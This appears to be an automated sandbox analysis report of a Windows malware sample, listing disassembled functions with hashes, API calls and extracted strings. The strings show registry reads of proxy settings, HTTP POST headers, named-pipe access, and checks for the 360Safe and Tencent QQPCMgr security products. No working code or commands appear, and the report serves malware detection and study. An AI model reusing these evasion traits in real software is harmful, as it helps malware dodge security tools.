                                                                                                                                                • Opcode ID: fa827408a8f9456c1e0779950962fdb9fd915d18edb79f35fcf11f3ebf01605a
                                                                                                                                                • Instruction ID: 41e2625f1b5f1b296c41b000f148f95bffbbaca9bb85b5a2337090ae48548098
                                                                                                                                                • Opcode Fuzzy Hash: fa827408a8f9456c1e0779950962fdb9fd915d18edb79f35fcf11f3ebf01605a
                                                                                                                                                • Instruction Fuzzy Hash: 82E1B572900209AFCF01EFA8C941BEE7BB5AF59318F05412AFD44BB282D7759E05CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00426F80, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                • String ID: $0123456789ABCDEF$0123456789abcdef
                                                                                                                                                • API String ID: 1302938615-30751140
                                                                                                                                                • Opcode ID: c59d2d1e85fd2753ebce2d1eb2c4a721000ebf75c78a54823684a6baad5373b5
                                                                                                                                                • Instruction ID: 486db474da5697b43c337eda1abfa69955ed90a7475341e6408d60f1d905287f
                                                                                                                                                • Opcode Fuzzy Hash: c59d2d1e85fd2753ebce2d1eb2c4a721000ebf75c78a54823684a6baad5373b5
                                                                                                                                                • Instruction Fuzzy Hash: 95819B71A0C3618FDB14CF29E84062BB7E1AFC8308F85495EF984A7341D779DD098B9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B677A, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 217COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: tcp$udp$v$L
                                                                                                                                                • API String ID: 0-3078230542
                                                                                                                                                • Opcode ID: b9eede8dd2e12199cb9e69643aa023e524a164128a0fb813f7e1c088b3f3f73d
                                                                                                                                                • Instruction ID: f705ec312fd09e8bd1c360c508e853198a431bb0d9674bfd75717808391e7353
                                                                                                                                                • Opcode Fuzzy Hash: b9eede8dd2e12199cb9e69643aa023e524a164128a0fb813f7e1c088b3f3f73d
                                                                                                                                                • Instruction Fuzzy Hash: 21817DB1C01219DFCF219F99C8406FEBBB4EF54304F26816BE445A7260D77C8A80DBA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E498, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E49D
                                                                                                                                                  • Part of subcall function 0040E8C0: __EH_prolog.LIBCMT ref: 0040E8C5
                                                                                                                                                Strings
                                                                                                                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0040E4D6
                                                                                                                                                • User-Agent: Mozilla/4.0, xrefs: 0040E4E1
                                                                                                                                                • Accept: */*, xrefs: 0040E4EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: Accept: */*$Content-Type: application/x-www-form-urlencoded$User-Agent: Mozilla/4.0
                                                                                                                                                • API String ID: 3519838083-3429858835
                                                                                                                                                • Opcode ID: c0ef92fc76695590a9a7f057c6625585df012ef57415b17949cd0057272eca56
                                                                                                                                                • Instruction ID: 8f526a88d5ee6dbe2e92da0baddb94cb72eb8ca1b557f15a9244e7cf9dadf497
                                                                                                                                                • Opcode Fuzzy Hash: c0ef92fc76695590a9a7f057c6625585df012ef57415b17949cd0057272eca56
                                                                                                                                                • Instruction Fuzzy Hash: 02512A71D40214BBCF21AAB6AC82DAE76A9EB24764F10082BF501772C3DA7E495187DD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E69A, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E69F
                                                                                                                                                  • Part of subcall function 0040DE85: __EH_prolog.LIBCMT ref: 0040DE8A
                                                                                                                                                  • Part of subcall function 0040DE85: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040DEDF
                                                                                                                                                  • Part of subcall function 0040DE85: RegCloseKey.ADVAPI32(00000050), ref: 0040DF0C
                                                                                                                                                  • Part of subcall function 0040DF2B: __EH_prolog.LIBCMT ref: 0040DF30
                                                                                                                                                  • Part of subcall function 0040DF2B: RegOpenKeyExW.ADVAPI32(80000001,00000050,00000000,00000001,00000000), ref: 0040DF89
                                                                                                                                                  • Part of subcall function 0040DF2B: RegCloseKey.ADVAPI32(00000000,00000000,Proxy Port,00000050,?), ref: 0040DFBD
                                                                                                                                                  • Part of subcall function 0040DFDB: __EH_prolog.LIBCMT ref: 0040DFE0
                                                                                                                                                  • Part of subcall function 0040DFDB: _memset.LIBCMT ref: 0040E009
                                                                                                                                                  • Part of subcall function 0040DFDB: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,0050EB7C), ref: 0040E055
                                                                                                                                                  • Part of subcall function 0040DFDB: RegCloseKey.ADVAPI32(?,?,00000000,?,0050EB7C), ref: 0040E09B
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$CloseOpen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_memset
                                                                                                                                                • String ID: %s:%s$P$|P
                                                                                                                                                • API String ID: 2185476623-3699797963
                                                                                                                                                • Opcode ID: 11795defee477b16ea5b85a83a71f34bb2bfaf1642742826b1556c03305d85e1
                                                                                                                                                • Instruction ID: 696a280e7a290548a43bcd0d251ad5842fbc17f1aa82ab143aa8b27b34a33c1d
                                                                                                                                                • Opcode Fuzzy Hash: 11795defee477b16ea5b85a83a71f34bb2bfaf1642742826b1556c03305d85e1
                                                                                                                                                • Instruction Fuzzy Hash: F451D432D001199BCF20EBA9CD42BAEB7B4AF04354F04457BF915BB2D2DB789A54CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041A3F6, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog__wcsicmp
                                                                                                                                                • String ID: content-length$|P
                                                                                                                                                • API String ID: 2034386301-339770886
                                                                                                                                                • Opcode ID: 704468bf937ee58c013036078331a44edade505c06e0b4d626a68e701fccbb7b
                                                                                                                                                • Instruction ID: b175c810bd2a7799e79e3ee9ce4a38584a277d864ee36905999d26bc19e67c51
                                                                                                                                                • Opcode Fuzzy Hash: 704468bf937ee58c013036078331a44edade505c06e0b4d626a68e701fccbb7b
                                                                                                                                                • Instruction Fuzzy Hash: F2519F31D01108DBCB11EFA9C4856EEFBF5AF44318F14412BE415B7291C778AA85CBAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00434E00, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 159COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncmp
                                                                                                                                                • String ID: .\crypto\x509v3\v3_crld.c$fullname$relativename
                                                                                                                                                • API String ID: 909875538-3737910691
                                                                                                                                                • Opcode ID: 391d1f0ae7a71fc80bacea596a77411f5bb44b5b3aacdd67a9383a063f003045
                                                                                                                                                • Instruction ID: 22a119a95265cfaf73d5584bb0e15b1cb5f0b88c6fb835de68260849ae267fe8
                                                                                                                                                • Opcode Fuzzy Hash: 391d1f0ae7a71fc80bacea596a77411f5bb44b5b3aacdd67a9383a063f003045
                                                                                                                                                • Instruction Fuzzy Hash: 88412E76B403146BE2107A66BC42B9773489F84725F28017BFD099B3C3DBADF84146AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00419236, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog_memset_strlen
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 607265390-2149487505
                                                                                                                                                • Opcode ID: d3df06e46884b4210847c3860b960aea74a746266fa20508f5bdff34bfbcd069
                                                                                                                                                • Instruction ID: e353b26752cf1f1adf76238c06ac54bebe0fc6dc8a321b3b4aedfd5100933e9c
                                                                                                                                                • Opcode Fuzzy Hash: d3df06e46884b4210847c3860b960aea74a746266fa20508f5bdff34bfbcd069
                                                                                                                                                • Instruction Fuzzy Hash: D951E63190010DDBDF10DB99C855BEEBBB5AF08314F14446BE825A72D1C63C9EC28B9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00412330, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00412335
                                                                                                                                                  • Part of subcall function 004124B0: __EH_prolog.LIBCMT ref: 004124B5
                                                                                                                                                  • Part of subcall function 004124B0: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 0041251C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$Close
                                                                                                                                                • String ID: C:\Program Files (x86)\360\360Safe\$C:\Program Files\360\360Safe\$|P
                                                                                                                                                • API String ID: 1511779150-2204400252
                                                                                                                                                • Opcode ID: 5eebb6980e2a4f8e73b1600658a5e7403e630db34811cda339b60b5aaad71f2f
                                                                                                                                                • Instruction ID: 93809fbbc9a5cd6c55be1bf38c365d03e2cbb58d2b0a349c1b53351b640ae786
                                                                                                                                                • Opcode Fuzzy Hash: 5eebb6980e2a4f8e73b1600658a5e7403e630db34811cda339b60b5aaad71f2f
                                                                                                                                                • Instruction Fuzzy Hash: 8D41BF71D0010D9BCF10DFA9DA85AEEBBF8AF48318F10406BE515F7292C7789A44CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0042CBD0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                • API String ID: 2102423945-294840303
                                                                                                                                                • Opcode ID: 95f42d77e17f6a11a6aea8f8d1d984739206d5e6ab0fa1a2f7526fd591e3b69d
                                                                                                                                                • Instruction ID: 4bb162841090a635c03e9a5848cebe2445fbff1592c9dcc4d3eeb140c1d99703
                                                                                                                                                • Opcode Fuzzy Hash: 95f42d77e17f6a11a6aea8f8d1d984739206d5e6ab0fa1a2f7526fd591e3b69d
                                                                                                                                                • Instruction Fuzzy Hash: 42212BB6B403213BD210AA6EFC83F5AE7989B40B60F55852BF50DD73C2E6A89C5142D4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00416FF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00416FFD
                                                                                                                                                  • Part of subcall function 0040394C: __EH_prolog.LIBCMT ref: 00403951
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,\\.\pipe\), ref: 00417083
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417092
                                                                                                                                                  • Part of subcall function 004119AC: __EH_prolog.LIBCMT ref: 004119B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$CloseCreateFileHandle
                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                • API String ID: 1152210893-91387939
                                                                                                                                                • Opcode ID: 03fd998e1fd62a5cd4ef101ae35d695b68503df25cca0b7c6bc718ade9c90a60
                                                                                                                                                • Instruction ID: 9728d139a5d0482f8183b7d25c96f1a8ecd160ffa4db711b1bda0e472da86953
                                                                                                                                                • Opcode Fuzzy Hash: 03fd998e1fd62a5cd4ef101ae35d695b68503df25cca0b7c6bc718ade9c90a60
                                                                                                                                                • Instruction Fuzzy Hash: D921507580414DAEDB10EFA8CC85EEE7B7CEF0036CF10462AF525B71D2C6799A448769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041AE2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041AE30
                                                                                                                                                  • Part of subcall function 0040394C: __EH_prolog.LIBCMT ref: 00403951
                                                                                                                                                  • Part of subcall function 0040D74A: _wcschr.LIBCMT ref: 0040D75D
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,0000005C,?,00419C4F,?,?,?,?,?,?,?,00419C4F), ref: 0041AEA0
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,00419C4F), ref: 0041AEAE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$AttributesCreateDirectoryFile_wcschr
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 849846381-2149487505
                                                                                                                                                • Opcode ID: 1d5a19967571cfc1f3d5b31715a4386a507c6a3dbcc8ed082e64837e0fcdd231
                                                                                                                                                • Instruction ID: 87d0792f5b1616a2ea928d6f2b3b027692368bfc911689c58771688b6c99afaa
                                                                                                                                                • Opcode Fuzzy Hash: 1d5a19967571cfc1f3d5b31715a4386a507c6a3dbcc8ed082e64837e0fcdd231
                                                                                                                                                • Instruction Fuzzy Hash: C621F9369402059BCB10EBA9CC45BEEBBB4FF44319F10053AE511B72C2C7745E098B95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00412637, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041263C
                                                                                                                                                  • Part of subcall function 00411FE1: __EH_prolog.LIBCMT ref: 00411FE6
                                                                                                                                                  • Part of subcall function 00411FE1: _memset.LIBCMT ref: 0041202F
                                                                                                                                                  • Part of subcall function 00411FE1: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,004FC0BC,00000000), ref: 00412052
                                                                                                                                                  • Part of subcall function 00411FE1: PathAddBackslashW.SHLWAPI(?,?,00000000,?,?,004FC0BC,00000000), ref: 0041209E
                                                                                                                                                  • Part of subcall function 00411FE1: RegCloseKey.ADVAPI32(?,00000000), ref: 004120BD
                                                                                                                                                  • Part of subcall function 004119AC: __EH_prolog.LIBCMT ref: 004119B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$BackslashCloseOpenPath_memset
                                                                                                                                                • String ID: InstallDir$SOFTWARE\Tencent\QQPCMgr$|P
                                                                                                                                                • API String ID: 2105566652-2680235536
                                                                                                                                                • Opcode ID: 88de171b13fc2eb7140431906bdaf97f633d946f680fb22e09af613943847c3d
                                                                                                                                                • Instruction ID: 85bb74a503b2b68a383a299d9f3be1f27c0a295c10de92006c6556a7cb71ff03
                                                                                                                                                • Opcode Fuzzy Hash: 88de171b13fc2eb7140431906bdaf97f633d946f680fb22e09af613943847c3d
                                                                                                                                                • Instruction Fuzzy Hash: F5218372D0010D9BCB00EFE9C981AEEFBB8EF44319F14416EE515B7282D7785A45CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041C85E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C863
                                                                                                                                                • _memset.LIBCMT ref: 0041C8A7
                                                                                                                                                  • Part of subcall function 0041462E: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041464C
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
